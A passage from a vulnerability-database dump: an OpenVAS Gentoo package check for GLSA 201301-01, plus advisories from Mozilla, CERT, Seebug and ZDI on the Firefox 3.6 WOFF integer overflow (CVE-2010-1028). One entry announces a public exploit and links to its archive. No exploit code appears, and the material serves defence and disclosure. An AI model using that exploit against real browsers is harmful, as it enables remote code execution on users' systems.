"CVE-2012-0463", "CVE-2010-4508", "CVE-2009-1310", "CVE-2009-3077", "CVE-2011-3003", "CVE-2011-2991", "CVE-2008-5015", "CVE-2011-0082", "CVE-2011-2983", "CVE-2012-4179", "CVE-2008-4582", "CVE-2011-3001", "CVE-2012-1964", "CVE-2009-2462", "CVE-2009-3378", "CVE-2011-3062", "CVE-2009-1303", "CVE-2012-0477", "CVE-2012-0473", "CVE-2012-4194", "CVE-2011-2365", "CVE-2012-4209", "CVE-2012-1963", "CVE-2012-4196", "CVE-2008-5506", "CVE-2009-2404", "CVE-2009-2465", "CVE-2012-0467", "CVE-2011-2981", "CVE-2012-0458", "CVE-2010-0169", "CVE-2010-2752", "CVE-2009-3078", "CVE-2012-0471", "CVE-2012-3961", "CVE-2010-3766", "CVE-2012-3971", "CVE-2008-5052", "CVE-2011-0055", "CVE-2009-1828", "CVE-2011-0072"], "description": "Gentoo Linux Local Security Checks GLSA 201301-01", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121000", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121000", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201301-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201301-01.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121000\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:25:19 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201301-01\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Mozilla Firefox, Thunderbird, SeaMonkey, NSS, GNU IceCat, and XULRunner. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201301-01\");\n script_cve_id(\"CVE-2011-3101\", \"CVE-2007-2436\", \"CVE-2007-2437\", \"CVE-2007-2671\", \"CVE-2007-3073\", \"CVE-2008-0016\", \"CVE-2008-0017\", \"CVE-2008-0367\", \"CVE-2008-3835\", \"CVE-2008-3836\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4063\", \"CVE-2008-4064\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\", \"CVE-2008-4070\", \"CVE-2008-4582\", \"CVE-2008-5012\", \"CVE-2008-5013\", \"CVE-2008-5014\", \"CVE-2008-5015\", \"CVE-2008-5016\", \"CVE-2008-5017\", \"CVE-2008-5018\", \"CVE-2008-5019\", \"CVE-2008-5021\", \"CVE-2008-5022\", \"CVE-2008-5023\", \"CVE-2008-5024\", \"CVE-2008-5052\", \"CVE-2008-5500\", \"CVE-2008-5501\", \"CVE-2008-5502\", \"CVE-2008-5503\", \"CVE-2008-5504\", \"CVE-2008-5505\", \"CVE-2008-5506\", \"CVE-2008-5507\", \"CVE-2008-5508\", \"CVE-2008-5510\", \"CVE-2008-5511\", \"CVE-2008-5512\", \"CVE-2008-5513\", \"CVE-2008-5822\", \"CVE-2008-5913\", \"CVE-2008-6961\", \"CVE-2009-0071\", \"CVE-2009-0352\", \"CVE-2009-0353\", \"CVE-2009-0354\", \"CVE-2009-0355\", \"CVE-2009-0356\", \"CVE-2009-0357\", \"CVE-2009-0358\", \"CVE-2009-0652\", \"CVE-2009-0771\", \"CVE-2009-0772\", \"CVE-2009-0773\", \"CVE-2009-0774\", \"CVE-2009-0775\", \"CVE-2009-0776\", \"CVE-2009-0777\", \"CVE-2009-1044\", \"CVE-2009-1169\", \"CVE-2009-1302\", \"CVE-2009-1303\", \"CVE-2009-1304\", \"CVE-2009-1305\", \"CVE-2009-1306\", \"CVE-2009-1307\", \"CVE-2009-1308\", \"CVE-2009-1309\", \"CVE-2009-1310\", \"CVE-2009-1311\", \"CVE-2009-1312\", \"CVE-2009-1313\", \"CVE-2009-1392\", \"CVE-2009-1563\", \"CVE-2009-1571\", \"CVE-2009-1828\", \"CVE-2009-1832\", \"CVE-2009-1833\", \"CVE-2009-1834\", \"CVE-2009-1835\", \"CVE-2009-1836\", \"CVE-2009-1837\", \"CVE-2009-1838\", \"CVE-2009-1839\", \"CVE-2009-1840\", \"CVE-2009-1841\", \"CVE-2009-2043\", \"CVE-2009-2044\", \"CVE-2009-2061\", \"CVE-2009-2065\", \"CVE-2009-2210\", \"CVE-2009-2404\", \"CVE-2009-2408\", \"CVE-2009-2462\", \"CVE-2009-2463\", \"CVE-2009-2464\", \"CVE-2009-2465\", \"CVE-2009-2466\", \"CVE-2009-2467\", \"CVE-2009-2469\", \"CVE-2009-2470\", \"CVE-2009-2471\", \"CVE-2009-2472\", \"CVE-2009-2477\", \"CVE-2009-2478\", \"CVE-2009-2479\", \"CVE-2009-2535\", \"CVE-2009-2654\", \"CVE-2009-2662\", \"CVE-2009-2664\", \"CVE-2009-2665\", \"CVE-2009-3069\", \"CVE-2009-3070\", \"CVE-2009-3071\", \"CVE-2009-3072\", \"CVE-2009-3074\", \"CVE-2009-3075\", \"CVE-2009-3076\", \"CVE-2009-3077\", \"CVE-2009-3078\", \"CVE-2009-3079\", \"CVE-2009-3274\", \"CVE-2009-3371\", \"CVE-2009-3372\", \"CVE-2009-3373\", \"CVE-2009-3374\", \"CVE-2009-3375\", \"CVE-2009-3376\", \"CVE-2009-3377\", \"CVE-2009-3378\", \"CVE-2009-3379\", \"CVE-2009-3380\", \"CVE-2009-3381\", \"CVE-2009-3382\", \"CVE-2009-3383\", \"CVE-2009-3388\", \"CVE-2009-3389\", \"CVE-2009-3555\", \"CVE-2009-3978\", \"CVE-2009-3979\", \"CVE-2009-3980\", \"CVE-2009-3981\", \"CVE-2009-3982\", \"CVE-2009-3983\", \"CVE-2009-3984\", \"CVE-2009-3985\", \"CVE-2009-3986\", \"CVE-2009-3987\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\", \"CVE-2010-0163\", \"CVE-2010-0164\", \"CVE-2010-0165\", \"CVE-2010-0166\", \"CVE-2010-0167\", \"CVE-2010-0168\", \"CVE-2010-0169\", \"CVE-2010-0170\", \"CVE-2010-0171\", \"CVE-2010-0172\", \"CVE-2010-0173\", \"CVE-2010-0174\", \"CVE-2010-0175\", \"CVE-2010-0176\", \"CVE-2010-0177\", \"CVE-2010-0178\", \"CVE-2010-0179\", \"CVE-2010-0181\", \"CVE-2010-0182\", \"CVE-2010-0183\", \"CVE-2010-0220\", \"CVE-2010-0648\", \"CVE-2010-0654\", \"CVE-2010-1028\", \"CVE-2010-1121\", \"CVE-2010-1125\", \"CVE-2010-1196\", \"CVE-2010-1197\", \"CVE-2010-1198\", \"CVE-2010-1199\", \"CVE-2010-1200\", \"CVE-2010-1201\", \"CVE-2010-1202\", \"CVE-2010-1203\", \"CVE-2010-1205\", \"CVE-2010-1206\", \"CVE-2010-1207\", \"CVE-2010-1208\", \"CVE-2010-1209\", \"CVE-2010-1210\", \"CVE-2010-1211\", \"CVE-2010-1212\", \"CVE-2010-1213\", \"CVE-2010-1214\", \"CVE-2010-1215\", \"CVE-2010-1585\", \"CVE-2010-2751\", \"CVE-2010-2752\", \"CVE-2010-2753\", \"CVE-2010-2754\", \"CVE-2010-2755\", \"CVE-2010-2760\", \"CVE-2010-2762\", \"CVE-2010-2763\", \"CVE-2010-2764\", \"CVE-2010-2765\", \"CVE-2010-2766\", \"CVE-2010-2767\", \"CVE-2010-2768\", \"CVE-2010-2769\", \"CVE-2010-2770\", \"CVE-2010-3131\", \"CVE-2010-3166\", \"CVE-2010-3167\", \"CVE-2010-3168\", \"CVE-2010-3169\", \"CVE-2010-3170\", \"CVE-2010-3171\", \"CVE-2010-3173\", \"CVE-2010-3174\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3399\", \"CVE-2010-3400\", \"CVE-2010-3765\", \"CVE-2010-3766\", \"CVE-2010-3767\", \"CVE-2010-3768\", \"CVE-2010-3769\", \"CVE-2010-3770\", \"CVE-2010-3771\", \"CVE-2010-3772\", \"CVE-2010-3773\", \"CVE-2010-3774\", \"CVE-2010-3775\", \"CVE-2010-3776\", \"CVE-2010-3777\", \"CVE-2010-3778\", \"CVE-2010-4508\", \"CVE-2010-5074\", \"CVE-2011-0051\", \"CVE-2011-0053\", \"CVE-2011-0054\", \"CVE-2011-0055\", \"CVE-2011-0056\", \"CVE-2011-0057\", \"CVE-2011-0058\", \"CVE-2011-0059\", \"CVE-2011-0061\", \"CVE-2011-0062\", \"CVE-2011-0065\", \"CVE-2011-0066\", \"CVE-2011-0067\", \"CVE-2011-0068\", \"CVE-2011-0069\", \"CVE-2011-0070\", \"CVE-2011-0071\", \"CVE-2011-0072\", \"CVE-2011-0073\", \"CVE-2011-0074\", \"CVE-2011-0075\", \"CVE-2011-0076\", \"CVE-2011-0077\", \"CVE-2011-0078\", \"CVE-2011-0079\", \"CVE-2011-0080\", \"CVE-2011-0081\", \"CVE-2011-0082\", \"CVE-2011-0083\", \"CVE-2011-0084\", \"CVE-2011-0085\", \"CVE-2011-1187\", \"CVE-2011-1202\", \"CVE-2011-1712\", \"CVE-2011-2362\", \"CVE-2011-2363\", \"CVE-2011-2364\", \"CVE-2011-2365\", \"CVE-2011-2369\", \"CVE-2011-2370\", \"CVE-2011-2371\", \"CVE-2011-2372\", \"CVE-2011-2373\", \"CVE-2011-2374\", \"CVE-2011-2375\", \"CVE-2011-2376\", \"CVE-2011-2377\", \"CVE-2011-2378\", \"CVE-2011-2605\", \"CVE-2011-2980\", \"CVE-2011-2981\", \"CVE-2011-2982\", \"CVE-2011-2983\", \"CVE-2011-2984\", \"CVE-2011-2985\", \"CVE-2011-2986\", \"CVE-2011-2987\", \"CVE-2011-2988\", \"CVE-2011-2989\", \"CVE-2011-2990\", \"CVE-2011-2991\", \"CVE-2011-2993\", \"CVE-2011-2995\", \"CVE-2011-2996\", \"CVE-2011-2997\", \"CVE-2011-2998\", \"CVE-2011-2999\", \"CVE-2011-3000\", \"CVE-2011-3001\", \"CVE-2011-3002\", \"CVE-2011-3003\", \"CVE-2011-3004\", \"CVE-2011-3005\", \"CVE-2011-3026\", \"CVE-2011-3062\", \"CVE-2011-3232\", \"CVE-2011-3389\", \"CVE-2011-3640\", \"CVE-2011-3647\", \"CVE-2011-3648\", \"CVE-2011-3649\", \"CVE-2011-3650\", \"CVE-2011-3651\", \"CVE-2011-3652\", \"CVE-2011-3653\", \"CVE-2011-3654\", \"CVE-2011-3655\", \"CVE-2011-3658\", \"CVE-2011-3659\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\", \"CVE-2011-3670\", \"CVE-2011-3866\", \"CVE-2011-4688\", \"CVE-2012-0441\", \"CVE-2012-0442\", \"CVE-2012-0443\", \"CVE-2012-0444\", \"CVE-2012-0445\", \"CVE-2012-0446\", \"CVE-2012-0447\", \"CVE-2012-0449\", \"CVE-2012-0450\", \"CVE-2012-0451\", \"CVE-2012-0452\", \"CVE-2012-0455\", \"CVE-2012-0456\", \"CVE-2012-0457\", \"CVE-2012-0458\", \"CVE-2012-0459\", \"CVE-2012-0460\", \"CVE-2012-0461\", \"CVE-2012-0462\", \"CVE-2012-0463\", \"CVE-2012-0464\", \"CVE-2012-0467\", \"CVE-2012-0468\", \"CVE-2012-0469\", \"CVE-2012-0470\", \"CVE-2012-0471\", \"CVE-2012-0473\", \"CVE-2012-0474\", \"CVE-2012-0475\", \"CVE-2012-0477\", \"CVE-2012-0478\", \"CVE-2012-0479\", \"CVE-2012-1937\", \"CVE-2012-1938\", \"CVE-2012-1939\", \"CVE-2012-1940\", \"CVE-2012-1941\", \"CVE-2012-1945\", \"CVE-2012-1946\", \"CVE-2012-1947\", \"CVE-2012-1948\", \"CVE-2012-1949\", \"CVE-2012-1950\", \"CVE-2012-1951\", \"CVE-2012-1952\", \"CVE-2012-1953\", \"CVE-2012-1954\", \"CVE-2012-1955\", \"CVE-2012-1956\", \"CVE-2012-1957\", \"CVE-2012-1958\", \"CVE-2012-1959\", \"CVE-2012-1960\", \"CVE-2012-1961\", \"CVE-2012-1962\", \"CVE-2012-1963\", \"CVE-2012-1964\", \"CVE-2012-1965\", \"CVE-2012-1966\", \"CVE-2012-1967\", \"CVE-2012-1970\", \"CVE-2012-1971\", \"CVE-2012-1972\", \"CVE-2012-1973\", \"CVE-2012-1974\", \"CVE-2012-1975\", \"CVE-2012-1976\", \"CVE-2012-1994\", \"CVE-2012-3956\", \"CVE-2012-3957\", \"CVE-2012-3958\", \"CVE-2012-3959\", \"CVE-2012-3960\", \"CVE-2012-3961\", \"CVE-2012-3962\", \"CVE-2012-3963\", \"CVE-2012-3964\", \"CVE-2012-3965\", \"CVE-2012-3966\", \"CVE-2012-3967\", \"CVE-2012-3968\", \"CVE-2012-3969\", \"CVE-2012-3970\", \"CVE-2012-3971\", \"CVE-2012-3972\", \"CVE-2012-3973\", \"CVE-2012-3975\", \"CVE-2012-3976\", \"CVE-2012-3977\", \"CVE-2012-3978\", \"CVE-2012-3980\", \"CVE-2012-3982\", \"CVE-2012-3984\", \"CVE-2012-3985\", \"CVE-2012-3986\", \"CVE-2012-3988\", \"CVE-2012-3989\", \"CVE-2012-3990\", \"CVE-2012-3991\", \"CVE-2012-3992\", \"CVE-2012-3993\", \"CVE-2012-3994\", \"CVE-2012-3995\", \"CVE-2012-4179\", \"CVE-2012-4180\", \"CVE-2012-4181\", \"CVE-2012-4182\", \"CVE-2012-4183\", \"CVE-2012-4184\", \"CVE-2012-4185\", \"CVE-2012-4186\", \"CVE-2012-4187\", \"CVE-2012-4188\", \"CVE-2012-4190\", \"CVE-2012-4191\", \"CVE-2012-4192\", \"CVE-2012-4193\", \"CVE-2012-4194\", \"CVE-2012-4195\", \"CVE-2012-4196\", \"CVE-2012-4201\", \"CVE-2012-4202\", \"CVE-2012-4204\", \"CVE-2012-4205\", \"CVE-2012-4206\", \"CVE-2012-4207\", \"CVE-2012-4208\", \"CVE-2012-4209\", \"CVE-2012-4210\", \"CVE-2012-4212\", \"CVE-2012-4215\", \"CVE-2012-4216\", \"CVE-2012-5354\", \"CVE-2012-5829\", \"CVE-2012-5830\", \"CVE-2012-5833\", \"CVE-2012-5835\", \"CVE-2012-5836\", \"CVE-2012-5838\", \"CVE-2012-5839\", \"CVE-2012-5840\", \"CVE-2012-5841\", \"CVE-2012-5842\", \"CVE-2012-5843\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201301-01\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-client/firefox\", unaffected: make_list(\"ge 10.0.11\"), vulnerable: make_list(\"lt 10.0.11\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-client/firefox-bin\", unaffected: make_list(\"ge 10.0.11\"), vulnerable: make_list(\"lt 10.0.11\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"mail-client/thunderbird\", unaffected: make_list(\"ge 10.0.11\"), vulnerable: make_list(\"lt 10.0.11\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"mail-client/thunderbird-bin\", unaffected: make_list(\"ge 10.0.11\"), vulnerable: make_list(\"lt 10.0.11\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-client/seamonkey\", unaffected: make_list(\"ge 2.14-r1\"), vulnerable: make_list(\"lt 2.14-r1\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-client/seamonkey-bin\", unaffected: make_list(\"ge 2.14\"), vulnerable: make_list(\"lt 2.14\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/nss\", unaffected: make_list(\"ge 3.14\"), vulnerable: make_list(\"lt 3.14\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-client/mozilla-firefox\", unaffected: make_list(), vulnerable: make_list(\"lt 3.6.8\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-client/mozilla-firefox-bin\", unaffected: make_list(), vulnerable: make_list(\"lt 3.5.6\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"mail-client/mozilla-thunderbird\", unaffected: make_list(), vulnerable: make_list(\"lt 3.0.4-r1\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"mail-client/mozilla-thunderbird-bin\", unaffected: make_list(), vulnerable: make_list(\"lt 3.0\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-client/icecat\", unaffected: make_list(), vulnerable: make_list(\"lt 10.0-r1\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-libs/xulrunner\", unaffected: make_list(), vulnerable: make_list(\"lt 2.0-r1\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-libs/xulrunner-bin\", unaffected: make_list(), vulnerable: make_list(\"lt 1.8.1.19\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1028"], "description": "Mozilla Foundation Security Advisory 2010-08\r\n\r\nTitle: WOFF heap corruption due to integer overflow\r\nImpact: Critical\r\nAnnounced: March 22, 2010\r\nReporter: Evgeny Legerov\r\nProducts: Firefox 3.6\r\n\r\nFixed in: Firefox 3.6.2\r\nDescription\r\n\r\nSecurity researcher Evgeny Legerov of Intevydis reported that the WOFF decoder contains an integer overflow in a font decompression routine. This flaw could result in too small a memory buffer being allocated to store a downloadable font. An attacker could use this vulnerability to crash a victim's browser and execute arbitrary code on his/her system.\r\n\r\nSupport for the WOFF downloadable font format is new in Firefox 3.6 (Gecko 1.9.2); this vulnerability does not affect products built on earlier versions of the Mozilla browser engine.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=552216\r\n * CVE-2010-1028\r\n", "edition": 1, "modified": "2010-04-06T00:00:00", "published": "2010-04-06T00:00:00", "id": "SECURITYVULNS:DOC:23547", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23547", "title": "Mozilla Foundation Security Advisory 2010-08", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2010-1028"], "description": "\r\n\r\n\r\nHi Forks!\r\n\r\nI share my WOFF 1day exploit.\r\n\r\n* attachment:\r\nhttp://www.x90c.org/exploits/x90c_WOFF_exploit.tgz\r\n\r\n(dep bypass)\r\n\r\n* vulnerability:\r\n CVE-2010-1028 WOFF Heap Corruption due to Integer Overflow\r\n\r\n* affacted Products:\r\n - Mozilla Firefox 3.6 ( Gecko 1.9.2 )\r\n - Mozilla Firefox 3.6 Beta1, 3, 4, 5 ( Beta2 ko not released )\r\n - Mozilla Firefox 3.6 RC1, RC2\r\n", "edition": 1, "modified": "2013-08-20T00:00:00", "published": "2013-08-20T00:00:00", "id": "SECURITYVULNS:DOC:29712", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29712", "title": "x90c WOFF Firefox 1day exploit", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:36", "bulletinFamily": "software", "cvelist": ["CVE-2010-0176", "CVE-2010-0165", "CVE-2010-0168", "CVE-2010-0174", "CVE-2010-0172", "CVE-2010-0175", "CVE-2010-0170", "CVE-2010-0167", "CVE-2010-1121", "CVE-2010-0164", "CVE-2010-0166", "CVE-2010-0173", "CVE-2010-0161", "CVE-2009-3072", "CVE-2010-0178", "CVE-2010-0177", "CVE-2009-3555", "CVE-2010-0182", "CVE-2010-0181", "CVE-2010-1028", "CVE-2009-2463", "CVE-2010-0171", "CVE-2009-3075", "CVE-2010-0163", "CVE-2009-3385", "CVE-2010-0179", "CVE-2010-0169"], "description": "Multiple memory corruptions, integer overflows, array index overflows, information leak.", "edition": 1, "modified": "2013-08-20T00:00:00", "published": "2013-08-20T00:00:00", "id": "SECURITYVULNS:VULN:10745", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10745", "title": "\u041c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Mozilla Firefox / Seamonkey multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:19:02", "description": "BUGTRAQ ID: 38298\r\nCVE ID: CVE-2010-1028\r\n\r\nFirefox\u662f\u4e00\u6b3e\u6d41\u884c\u7684\u5f00\u6e90WEB\u6d4f\u89c8\u5668\u3002\r\n\r\nFirefox\u4e2d\u6240\u4f7f\u7528\u7684Web\u5f00\u653e\u5b57\u4f53\u683c\u5f0f\uff08WOFF\uff09\u89e3\u7801\u5668\u5728\u89e3\u6790\u5b57\u4f53\u6587\u4ef6\u4e2d\u6240\u6307\u5b9a\u7684\u8868\u683c\u5927\u5c0f\u65f6\u5b58\u5728\u6700\u7ec8\u53ef\u5bfc\u81f4\u5806\u6ea2\u51fa\u7684\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e\u3002\u5982\u679c\u7528\u6237\u6240\u8bbf\u95ee\u7f51\u9875\u4e2d\u6240\u5d4c\u5165\u7684WOFF\u5b57\u4f53\u5305\u542b\u6709\u8d85\u957f\u7684origLen\u5b57\u6bb5\u7684\u8bdd\uff0c\u5c31\u53ef\u4ee5\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nMozilla Firefox 3.6\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u6b62\u4e0b\u8f7d\u8fdc\u7a0b\u5b57\u4f53\uff0c\u5728\u6d4f\u89c8\u5668\u7684\u5730\u5740\u680f\u4e2d\u8f93\u5165about:config\u5e76\u5c06\u4ee5\u4e0b\u503c\u8bbe\u7f6e\u4e3afalse\uff1a\r\n\r\ngfx.downloadable_fonts.enabled\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMozilla\r\n-------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.mozilla.org/", "published": "2010-03-24T00:00:00", "title": "Mozilla Firefox 3.6 WOFF\u89e3\u7801\u5668\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1028"], "modified": "2010-03-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19337", "id": "SSV:19337", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "cert": [{"lastseen": "2020-09-18T20:42:05", "bulletinFamily": "info", "cvelist": ["CVE-2010-1028"], "description": "### Overview \n\nAn integer overflow in the Mozilla Web Open Fonts Format (WOFF) decoder may allow a remote attacker to execute code on an affected system.\n\n### Description \n\nThe Web Open Fonts Format (WOFF) is a simple compressed file format for fonts. Mozilla introduced support for WOFF in the 1.9.2 branch of the base software, which is used by Firefox versions 3.6 and later.\n\nAn integer overflow error exists in the way the WOFF decoder handles the size of tables specified in the font file. This error could result in a buffer overflow vulnerability on a subsequent memory allocation. A remote attacker who is able to supply a malicious WOFF file could exploit this vulnerability. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attack may be able to execute arbitrary code with the privileges of the victim user. \n \n--- \n \n### Solution \n\n**Upgrade** \n \nMozilla has addressed this issue in Firefox version 3.6.2. Users are encouraged to upgrade to this version of the browser. \n \n--- \n \n**Disable downloading of remote fonts**\n\n \nBy performing the following steps, it is possible to prevent Mozilla from retrieving and displaying remote fonts. \n\n\n 1. Enter \"about:config\" into the browser's address bar. This will display Firefox's configuration values.\n 2. Set the following value to false:\ngfx.downloadable_fonts.enabled \n--- \n \n### Vendor Information\n\nAny Mozilla-derived product that uses the Mozilla 1.9.2 code could be affected. \n \n--- \n \n964549\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Mozilla __ Affected\n\nNotified: February 19, 2010 Updated: March 23, 2010 \n\n**Statement Date: March 22, 2010**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nMozilla has published [Mozilla Foundation Security Advisory 2010-08](<http://www.mozilla.org/security/announce/2010/mfsa2010-08.html>) in response to this issue. Users are encouraged to review this advisory and install the updated software it describes.\n\n### Vendor References\n\n * <http://www.mozilla.org/security/announce/2010/mfsa2010-08.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.theregister.co.uk/2010/02/18/firefox_zero_day_report/>\n * <http://blog.mozilla.com/security/2010/03/18/update-on-secunia-advisory-sa38608/>\n * <http://secunia.com/advisories/38608/>\n * <http://people.mozilla.com/~jkew/woff/woff-spec-latest.html>\n * <http://hacks.mozilla.org/2009/10/woff/>\n * <https://bugzilla.mozilla.org/show_bug.cgi?id=552216>\n\n### Acknowledgements\n\nThis vulnerability was reported to Mozilla by Evgeny Legerov of Intevydis.\n\nThis document was written by Chad R Dougherty.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-1028](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-1028>) \n---|--- \n**Severity Metric:** | 16.88 \n**Date Public:** | 2010-03-17 \n**Date First Published:** | 2010-03-23 \n**Date Last Updated: ** | 2010-07-28 17:02 UTC \n**Document Revision: ** | 17 \n", "modified": "2010-07-28T17:02:00", "published": "2010-03-23T00:00:00", "id": "VU:964549", "href": "https://www.kb.cert.org/vuls/id/964549", "type": "cert", "title": "Mozilla WOFF decoder integer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:40:43", "bulletinFamily": "info", "cvelist": ["CVE-2010-1028"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way the browser loads a WOFF-based font. Upon calculating the length of some data read from the file, the application will miscalculate a size used for an allocation, and then copy an incorrect amount of data into that buffer. Due to the difference between the size of the allocation and the size of the copy, a buffer overflow will occur which can lead to code execution under the context of the application.", "modified": "2010-06-22T00:00:00", "published": "2010-04-06T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-10-064/", "id": "ZDI-10-064", "title": "Mozilla Firefox WOFF Font Format dirEntry Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 